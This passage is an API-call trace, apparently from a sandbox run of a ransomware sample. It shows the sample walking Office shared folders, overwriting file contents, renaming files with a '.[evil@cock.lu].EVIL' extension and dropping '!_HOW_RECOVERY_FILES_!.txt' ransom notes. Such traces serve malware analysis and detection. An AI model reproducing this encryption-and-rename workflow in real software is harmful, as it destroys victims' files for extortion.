lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x74e0, lpOverlapped=0x0) returned 1 [0088.960] CloseHandle (hObject=0x1a8) returned 1 [0088.961] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.961] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0088.961] __uncaught_exception () returned 0x84b1160800 [0088.961] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.962] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll.[evil@cock.lu].evil")) returned 1 [0088.963] ??_V@YAXPEAX@Z () returned 0x1 [0088.966] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll", dwFileAttributes=0x0) returned 0 [0088.966] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.966] FindClose (in: hFindFile=0x84b11dd1a0 | out: hFindFile=0x84b11dd1a0) returned 1 [0088.966] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller") returned 0x50 [0088.967] strlen (_Str="${KEY}") returned 0x6 [0088.967] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.967] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.967] strlen (_Str="${CODE}") returned 0x7 [0088.967] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.967] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.967] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.967] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.968] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.968] __uncaught_exception () returned 0x84b1160800 [0088.968] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.968] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0088.969] FindClose (in: hFindFile=0x84b11dd680 | out: hFindFile=0x84b11dd680) returned 1 [0088.969] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16") returned 0x38 [0088.969] strlen (_Str="${KEY}") returned 0x6 [0088.969] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.969] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.969] strlen (_Str="${CODE}") returned 0x7 [0088.969] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.969] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.969] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.969] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.971] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.971] __uncaught_exception () returned 0x84b1160800 [0088.971] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.971] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0088.971] wcsstr (_Str="OfficeSoftwareProtectionPlatform", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.971] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform") returned 80 [0088.971] wcscmp (_String1=".", _String2="OfficeSoftwareProtectionPlatform") returned -1 [0088.971] wcscmp (_String1="..", _String2="OfficeSoftwareProtectionPlatform") returned -1 [0088.972] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform") returned 0x50 [0088.972] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform") returned 0x0 [0088.972] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*" [0088.972] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd680 [0088.972] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.972] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\.") returned 82 [0088.972] wcscmp (_String1=".", _String2=".") returned 0 [0088.972] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.972] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.972] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\..") returned 83 [0088.972] wcscmp (_String1=".", _String2="..") returned -1 [0088.972] wcscmp (_String1="..", _String2="..") returned 0 [0088.972] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0088.972] FindClose (in: hFindFile=0x84b11dd680 | out: hFindFile=0x84b11dd680) returned 1 [0088.972] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform") returned 0x50 [0088.972] strlen (_Str="${KEY}") returned 0x6 [0088.972] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.972] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.972] strlen (_Str="${CODE}") returned 0x7 [0088.972] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.972] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.972] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.972] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.973] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.973] __uncaught_exception () returned 0x84b1160800 [0088.973] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.974] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0088.974] wcsstr (_Str="Source Engine", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.974] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine") returned 61 [0088.974] wcscmp (_String1=".", _String2="Source Engine") returned -1 [0088.974] wcscmp (_String1="..", _String2="Source Engine") returned -1 [0088.974] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine") returned 0x3d [0088.974] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine") returned 0x0 [0088.974] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*" [0088.974] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd140 [0088.974] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.974] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\.") returned 63 [0088.974] wcscmp (_String1=".", _String2=".") returned 0 [0088.974] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.974] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.974] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\..") returned 64 [0088.975] wcscmp (_String1=".", _String2="..") returned -1 [0088.975] wcscmp (_String1="..", _String2="..") returned 0 [0088.975] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.975] wcsstr (_Str="OSE.EXE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.975] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0088.975] wcscmp (_String1="OSE.EXE", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.975] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OSE.EXE") returned 0x0 [0088.975] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 0x45 [0088.975] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0088.977] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3f8c8, lpOverlapped=0x0) returned 1 [0088.994] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0088.994] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.994] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.994] _errno () returned 0x84b1160840 [0088.995] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.995] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3f8e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x3f8e0, lpOverlapped=0x0) returned 1 [0088.995] CloseHandle (hObject=0x1a4) returned 1 [0088.999] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.000] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.000] __uncaught_exception () returned 0x84b1160800 [0089.000] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.002] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.[evil@cock.lu].evil")) returned 1 [0089.003] ??_V@YAXPEAX@Z () returned 0x1 [0089.006] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE", dwFileAttributes=0x0) returned 0 [0089.006] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0089.006] FindClose (in: hFindFile=0x84b11dd140 | out: hFindFile=0x84b11dd140) returned 1 [0089.006] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine") returned 0x3d [0089.006] strlen (_Str="${KEY}") returned 0x6 [0089.006] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.006] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.006] strlen (_Str="${CODE}") returned 0x7 [0089.006] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.006] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.006] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.006] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Source Engine\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.007] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.007] __uncaught_exception () returned 0x84b1160800 [0089.007] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.008] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.008] wcsstr (_Str="Stationery", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.008] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 58 [0089.008] wcscmp (_String1=".", _String2="Stationery") returned -1 [0089.008] wcscmp (_String1="..", _String2="Stationery") returned -1 [0089.008] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 0x3a [0089.008] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 0x0 [0089.008] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\*" [0089.008] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd560 [0089.024] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.024] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\.") returned 60 [0089.024] wcscmp (_String1=".", _String2=".") returned 0 [0089.024] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.024] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.024] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\..") returned 61 [0089.024] wcscmp (_String1=".", _String2="..") returned -1 [0089.024] wcscmp (_String1="..", _String2="..") returned 0 [0089.024] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.024] wcsstr (_Str="Bears.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.024] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned 68 [0089.024] wcscmp (_String1="Bears.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.024] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Bears.htm") returned 0x0 [0089.024] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned 0x44 [0089.024] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.025] GetLastError () returned 0x5 [0089.025] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.025] wcsstr (_Str="Bears.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.025] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned 68 [0089.025] wcscmp (_String1="Bears.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.025] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Bears.jpg") returned 0x0 [0089.025] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned 0x44 [0089.025] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.026] GetLastError () returned 0x5 [0089.026] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.026] wcsstr (_Str="Blue_Gradient.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.026] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg") returned 76 [0089.026] wcscmp (_String1="Blue_Gradient.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.026] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Blue_Gradient.jpg") returned 0x0 [0089.026] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg") returned 0x4c [0089.026] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.026] GetLastError () returned 0x5 [0089.026] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.026] wcsstr (_Str="Cave_Drawings.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.026] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif") returned 76 [0089.026] wcscmp (_String1="Cave_Drawings.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.026] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Cave_Drawings.gif") returned 0x0 [0089.026] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif") returned 0x4c [0089.026] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.026] GetLastError () returned 0x5 [0089.026] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.026] wcsstr (_Str="Connectivity.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.026] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif") returned 75 [0089.026] wcscmp (_String1="Connectivity.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.026] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Connectivity.gif") returned 0x0 [0089.026] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif") returned 0x4b [0089.026] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.027] GetLastError () returned 0x5 [0089.027] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.027] wcsstr (_Str="Desktop.ini", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.027] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0089.027] wcscmp (_String1="Desktop.ini", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.027] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Desktop.ini") returned 0x0 [0089.027] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 0x46 [0089.027] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0089.029] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x285, lpOverlapped=0x0) returned 1 [0089.031] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.031] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.031] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.031] _errno () returned 0x84b1160840 [0089.031] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.031] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2a0, lpOverlapped=0x0) returned 1 [0089.032] CloseHandle (hObject=0x1a4) returned 1 [0089.032] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.032] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.032] __uncaught_exception () returned 0x84b1160800 [0089.032] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.109] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.[evil@cock.lu].evil")) returned 1 [0089.110] ??_V@YAXPEAX@Z () returned 0x1 [0089.113] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini", dwFileAttributes=0x0) returned 0 [0089.113] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.113] wcsstr (_Str="Dotted_Lines.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.113] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf") returned 75 [0089.113] wcscmp (_String1="Dotted_Lines.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.113] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Dotted_Lines.emf") returned 0x0 [0089.113] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf") returned 0x4b [0089.113] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.113] GetLastError () returned 0x5 [0089.113] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.114] 